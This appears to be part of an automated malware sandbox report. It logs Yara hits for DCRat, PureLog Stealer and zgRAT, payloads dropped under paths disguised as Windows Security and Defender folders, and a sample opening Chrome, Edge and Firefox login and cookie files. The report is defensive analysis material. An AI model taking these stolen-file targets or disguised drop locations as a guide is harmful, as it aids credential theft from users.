Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

Code function: 0_2_0101DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0101DF1E

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

Code function: 0_2_0100B146 GetVersionExW,

0_2_0100B146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000004.00000002.1932393224.0000000013164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: driverInto.exe PID: 5936, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 4.0.driverInto.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.1783939727.0000000000AC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1622104471.0000000006DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\services.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match	File source: C:\portintosvc\driverInto.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Registration\csrss.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 4.0.driverInto.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\services.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match	File source: C:\portintosvc\driverInto.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Registration\csrss.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
